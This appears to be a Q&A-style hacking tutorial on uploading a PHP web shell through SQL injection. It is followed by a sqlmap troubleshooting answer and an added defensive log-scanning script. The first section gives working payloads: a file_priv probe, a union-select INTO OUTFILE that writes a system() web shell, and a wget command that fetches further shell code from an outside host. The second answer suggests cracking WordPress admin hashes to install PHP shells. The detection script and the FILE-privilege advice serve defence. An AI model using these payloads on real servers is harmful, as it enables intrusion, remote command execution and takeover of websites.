Uploading Shell Using SQLI

Yes, you can write your shell onto the web server with SQL statements without logging into the admin panel or any other control panel.

But for this you have to meet certain requirements:

  1. You must have write privileges and a writable directory (where you have to upload your shell)
  2. Root Path (i.e. /var/www/website/)
  3. Magic Quotes must be enabled

Check for write privileges

Now the question is how to check if you have write permissions? What you can simply do is read file_priv from the mysql.user table:

union select 1,2,3,concat(user(),0x3a,file_priv) from mysql.user--

If it says Y after your current user, then you are lucky and you have write privileges.

Create a file to receive the shell

Now it's time to make use of MySQL statements. We're going to use INTO OUTFILE, which writes your selected rows onto a file. The basic syntax is:

select column_name from table_name into outfile "filepath/file.extension"

Something like this should create a file named shell.php in the website directory and write that PHP code inside it:

http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"

Access the shell

Now we can access our shell by visiting http://website.com/shell.php?cmd=whoami. You can run any command after cmd=. You can now upload a ready-made shellcode to the server using curl or wget (on Linux servers):

`http://website.com/shell.php?cmd=wget http://othersite.com/shell.txt -O code.php`

And then you can access your shell with:

http://website.com/code.php

Hope you understood everything :)


First of all, if you are debugging a sqlmap failure you need to turn up the verbosity. No one can actually answer this question, because you did not gather the appropriate information.

The --os-shell works for MySQL by attempting to use an into outfile to write a file to the web root. This can fail for any number of reasons. The most common reason is that the database and web server are different machines. Ubuntu's default AppArmor rule sets forbid MySQL from writing to /var/www/. Also, into outfile requires file privileges that should never be granted (but often are). You could try using sqlmap's file-io functionality to read and write to the remote file system.

In the context of this application, dumping the contents of the WordPress MySQL database will yield the administrator's password hash. Cracking this hash will yield a WordPress admin account which almost always has the ability to upload and install WordPress extensions.... or PHP shells.
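
From the defender's side, the requests described in the answers above leave recognizable traces in web server access logs. The following is an added example, not code from either answer: it scans access-log lines for INTO OUTFILE writes and file_priv probes after undoing URL encoding (including double encoding) and inline SQL comments. The log lines are constructed, the function and rule names are hypothetical, and INTO DUMPFILE is included as a generalization beyond what the page shows.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /file.php?id=1 HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /file.php?id=1%20union%20select%201,2,3,concat(user(),0x3a,file_priv)%20from%20mysql.user-- HTTP/1.1" 200 640
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /file.php?id=1+union+select+1,2,3,4+INTO/**/OUTFILE+%22/var/www/website/public_html/x.php%22 HTTP/1.1" 200 0
203.0.113.9 - - [10/Oct/2023:13:58:40 +0000] "GET /file.php?id=1%2520union%2520select%25201,2%2520into%2520outfile%2520%2527/tmp/x%2527 HTTP/1.1" 500 0
198.51.100.7 - - [10/Oct/2023:14:02:03 +0000] "GET /blog/how-to-export-into-outfiles.html HTTP/1.1" 200 9000
"""

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
RULES = [  # hypothetical rule names; patterns run on the normalized request target
    ("file_write", re.compile(r"\binto\s+(?:outfile|dumpfile)\b\s*(?:['\"]\s*([^'\"]+))?")),
    ("priv_probe", re.compile(r"\bfile_priv\b")),
]

def normalize(target, max_rounds=3):
    """URL-decode repeatedly, replace /*...*/ comments with a space, collapse whitespace."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    target = re.sub(r"/\*.*?\*/", " ", target, flags=re.S)
    return re.sub(r"\s+", " ", target).lower()

def scan(log_text):
    """Return (client_ip, rule_name, target_path_or_None) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        req = REQUEST.match(line)
        if not req:
            continue
        ip, target = req.group(1), normalize(req.group(2))
        for name, pattern in RULES:
            m = pattern.search(target)
            if m:
                findings.append((ip, name, (m.groups() or (None,))[0]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The path reported for a file_write hit is where to look for a dropped file on the database host. Revoking the FILE privilege from the web application's database account removes the write primitive the requests depend on.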